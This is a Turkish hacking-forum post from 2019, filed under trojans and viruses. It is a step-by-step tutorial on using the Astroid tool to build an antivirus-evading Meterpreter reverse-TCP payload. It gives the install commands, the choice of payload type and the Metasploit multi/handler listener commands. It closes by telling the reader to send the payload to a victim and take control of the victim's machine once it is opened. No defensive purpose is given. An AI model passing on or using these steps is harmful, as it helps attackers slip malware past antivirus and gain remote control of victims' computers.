İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Astroid ile Payload Oluşturun // Qwx

28-04-2019 16:58
#1
Qwx - ait Kullanıcı Resmi (Avatar)
Qwx
Green Team (Deneyimli)
Üyelik tarihi:
04/2012
Nereden:
İzmir
Mesajlar:
2.642
Teşekkür (Etti):
81
Teşekkür (Aldı):
485
Konular:
85
Ticaret:
(0) %
Astroid

Bu araç sayesinde herhangi bir antivirüs programına yakalanmadan payload oluşturabilirsiniz.

Öncelikle aracımızı sistemimize indiriyoruz.
git clone https://github.com/M4sc3r4n0/astroid.git




Aracımızı indirdikten sonra cd astroid komutu ile klasöre giriş yapıyoruz.
Ardından chmod +x setup.sh komutu ile yetkilendirme işlemini yapıyoruz.




Aracın kurulum bölümü internet hızınıza göre değişkenlik göstermektedir.
Aracın çalışabilmesi adına 4 tane araç gereksinimi vardır. Program kurulum kısmında bu araçların varlığını kontrol etmektedir. Eğer ki bir veya birden fazla araç ekslikliği var ise program otomatik olarak kendisi bu araçları indirmektedir.
[ ✔ ] Métasploit-Framework..............[ found ]
[ ✔ ] Xterm.............................[ found ]
[ ✔ ] wine..............................[ found ]

[
✔ ] MinGw EXE................[ found ]
şeklinde bir çıktı aldığınız zaman kurulum işlemi çok daha kısa sürecektir ve ilgili araçların sisteminizde daha önceden kurulduğunu göstermektedir.



Kurulumun başarılı bir şekilde tamamlanmasının ardından ./astroid.sh komutu ile aracımızı çalıştırabiliriz.



Aracımızı başlattığımız zaman bu şekilde açılmaktadır. Bizlere ilk olarak Local Host IP adresimizi sormaktadır. Local Host IP adresimizi bulmak adına yeni bir terminal açarak terminalimize ifconfig komutunu yazıyoruz. İnternete bağlanmış olduğunuz cihaz wireless ise wlan* kısmında usb ise usb* kısmında ethernet ise eth* kısmında local host IP'nizi bulabilirsiniz.



Local Host IP adresimizi bulduktan sonra programda ilgili bölümü doldurup Enter'a basıyoruz. Ardından da bize Local Port sormaktadır. Local Port sorgusu için ilgili bölüme 4444 numaralı TCP bağlantı noktamızı yazıyoruz ve Enter'a basıyoruz.



Local Host IP ve Local Port tanımlamalarını yaptıkdan sonra bizlere oluşturmak istediğimiz payload'ın tipini sormaktadır. Ek olarak girişini yaptığınız bilgilerin doğruluğunu yukarıdan rahatlıkla kontrol edebilirsiniz. Programda oluşturabileceğiniz payloadlar;

1) meterpreter_reverse_tcp 5) meterpreter/reverse_https
2) meterpreter_reverse_https 6) meterpreter/reverse_winhttp
3) meterpreter/reverse_tcp 7) meterpreter/reverse_winhttps
4) meterpreter/reverse_http


Bu bölümde ben 3 numaraları payloadı kullanmak istiyorum. Ardından bizlere kodların tekrarlanması adına bir 1-70 arasında bir sayı istemektedir, bu bölüme 19 yazıyorum.



Ardından bizim verdiğimiz bilgiler dahilinde aracımız payloadı oluşturmaktadır.
Biraz beklediğimiz takdirde payload oluşumunun tamamlandığını araç bizlere bildirmektedir.



Aracın güzel bir yanı olarak da bu oluşturulan payloadı şimdi dinlemeye başlayalım mı ? sorusudur. Bu bölüme kolaylık açısından Y dediğiniz takdirde otomatik olarak Métasploit Framework açılarak ilgili tüm bilgiler araç tarafından doldurularak dinlenme işlemine başlamaktadır.



Aracın sorduğu soruya N seçeneğini seçerseniz ek olarak kendiniz Métasploit aracını başlatıp ilgili bölümleri doldurabilirsiniz.
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <localhostip>

set LPORT 4444
exploit




Ardından oluşturduğumuz payloadı kurbana yolluyoruz.
Kurban bizim oluşturduğumuz payload'ı açtığı zaman Métasploit aracı ile veya aracın otomatik olarak açmış olduğu Métasploit aracı ile istekleriniz doğrultusunda eylemlere gidebilirsiniz.

Kullanıcı İmzası
A hacker does for love what others would not do for money.
Konu Qwx tarafından (28-04-2019 17:00 Saat 17:00 ) değiştirilmiştir.
CYANİD, RootAdam, xANUBISx Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı